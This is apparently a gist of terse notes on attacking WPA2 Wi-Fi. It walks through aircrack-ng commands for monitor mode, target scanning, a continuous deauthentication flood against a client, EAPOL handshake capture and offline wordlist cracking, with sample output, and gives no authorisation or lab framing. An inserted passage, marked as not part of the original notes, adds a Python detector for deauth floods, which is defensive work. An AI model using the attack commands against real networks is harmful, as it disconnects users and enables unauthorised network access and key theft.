@raresteak
Created April 12, 2025 14:04
Some wifi notes

place adapter in monitor mode

sudo airmon-ng start wlan1

scan for targets

sudo airodump-ng wlan1mon --band a # a band 5ghz

or

sudo airodump-ng wlan1mon # defaults to bg 2ghz mode

narrow down your targets to one access point

obtain AP MAC and channel from above

sudo airodump-ng wlan1mon --band a --channel 173 -M -d AA:BB:CC:DD:EE:FF

-d access point MAC

deauth a station

sudo aireplay-ng --deauth 0 -c FF:EE:DD:CC:BB:AA -a AA:BB:CC:DD:EE:FF wlan1mon

-c station MAC -a access point MAC

output

13:16:55  Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE:FF) on channel 173
13:16:56  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [24|61 ACKs]
13:16:56  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [33|62 ACKs]
13:16:57  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|61 ACKs]
13:16:58  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|54 ACKs]
13:16:58  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|63 ACKs]
13:16:59  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|58 ACKs]
13:16:59  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|62 ACKs]
13:17:00  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [12|61 ACKs]
13:17:00  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|64 ACKs]
13:17:01  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|63 ACKs]
13:17:02  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|51 ACKs]
13:17:02  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|58 ACKs]
13:17:03  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|61 ACKs]
13:17:03  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 0|58 ACKs]
13:17:04  Sending 64 directed DeAuth (code 7). STMAC: [FF:EE:DD:CC:BB:AA] [ 1|60 ACKs]
^C
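
A defender-side view of the burst shown above, added here as an example and not part of the original notes: a sliding-window counter that flags an AP/station pair seeing deauthentication frames at flood rates. The record format (epoch,subtype,bssid,station,reason), the one-second window and the threshold of 30 are assumptions, and the sample frames are constructed.

```python
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 12   # 802.11 management subtype: deauthentication
WINDOW_S = 1.0        # assumed sliding-window length in seconds
THRESHOLD = 30        # assumed per-pair deauth count per window treated as a flood


def parse(line):
    """Parse one record in the assumed form: epoch,subtype,bssid,station,reason."""
    ts, subtype, bssid, station, reason = line.strip().split(",")
    return float(ts), int(subtype), bssid.upper(), station.upper(), int(reason)


def detect_deauth_floods(lines, window=WINDOW_S, threshold=THRESHOLD):
    """Return {(bssid, station): {first_seen, peak, reasons}} for flooded pairs."""
    recent = defaultdict(deque)   # (bssid, station) -> timestamps inside the window
    alerts = {}
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        ts, subtype, bssid, station, reason = parse(line)
        if subtype != DEAUTH_SUBTYPE:
            continue              # beacons, data and other frames are ignored
        q = recent[(bssid, station)]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()           # drop timestamps that fell out of the window
        if len(q) >= threshold:
            a = alerts.setdefault((bssid, station),
                                  {"first_seen": ts, "peak": 0, "reasons": set()})
            a["peak"] = max(a["peak"], len(q))
            a["reasons"].add(reason)
    return alerts


def constructed_sample():
    """Constructed frames: a beacon, one ordinary deauth, then a 64-frame burst."""
    lines = ["100.000,8,AA:BB:CC:DD:EE:FF,FF:FF:FF:FF:FF:FF,0",
             "100.200,12,AA:BB:CC:DD:EE:FF,FF:EE:DD:CC:BB:22,3"]
    lines += [f"{101 + i * 0.008:.3f},12,AA:BB:CC:DD:EE:FF,FF:EE:DD:CC:BB:AA,7"
              for i in range(64)]
    return lines


if __name__ == "__main__":
    for (bssid, sta), a in detect_deauth_floods(constructed_sample()).items():
        print(f"deauth flood: bssid={bssid} station={sta} "
              f"peak={a['peak']}/s reasons={sorted(a['reasons'])}")
```

A single deauthentication with an ordinary reason code stays below the threshold, so normal disconnects do not alert.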

capturing EAPOL

sudo airodump-ng wlan1mon --band a --channel 173 -M -d AA:BB:CC:DD:EE:FF -w mycapturefile

output

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSI    MANUFACTURER

 AA:BB:CC:DD:EE:FF  -57 100      324      553   52 153  780   WPA2 CCMP   PSK  862WIRE 2WIRE                                               

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 AA:BB:CC:DD:EE:FF  FF:EE:DD:CC:BB:11  -52   18e-24e  9207      306  EAPOL                                                                     
 AA:BB:CC:DD:EE:FF  FF:EE:DD:CC:BB:22  -50   24e-24      0       11                                                                            
 AA:BB:CC:DD:EE:FF  FF:EE:DD:CC:BB:33  -54   24e-24      0      205                                                                            
 AA:BB:CC:DD:EE:FF  FF:EE:DD:CC:BB:44  -55   24e-24      0       11                                                                            
Quitting...


wait for Notes column to show EAPOL, then stop capture

cracking

aircrack-ng -w somewordlist.txt mycapturefile-01.cap